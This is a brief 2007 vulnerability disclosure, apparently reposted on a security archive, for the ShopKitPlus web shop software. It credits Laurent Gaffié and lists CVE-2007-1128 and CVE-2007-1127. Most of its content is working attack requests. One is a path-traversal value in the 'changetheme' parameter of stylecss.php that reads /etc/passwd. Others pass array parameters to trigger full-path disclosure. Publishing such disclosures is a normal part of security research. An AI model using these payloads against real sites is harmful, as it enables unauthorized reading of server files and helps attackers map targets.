shopkitplus local file include

Published
Credit
Risk
2007.02.28
laurent gaffié
Medium
CWE
CVE
Local
Remote
N/A
CVE-2007-1128
CVE-2007-1127
No
Yes

lfi:
/shopkitplus/enc/stylecss.php?changetheme=../../../../../../../../../../
../../etc/passwd

full path:
/shopkitplus/events.php?curmonth[]=01
/shopkitplus/enc/stylecss.php?changetheme[]=

regards laurent gaffié


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2015, cxsecurity.com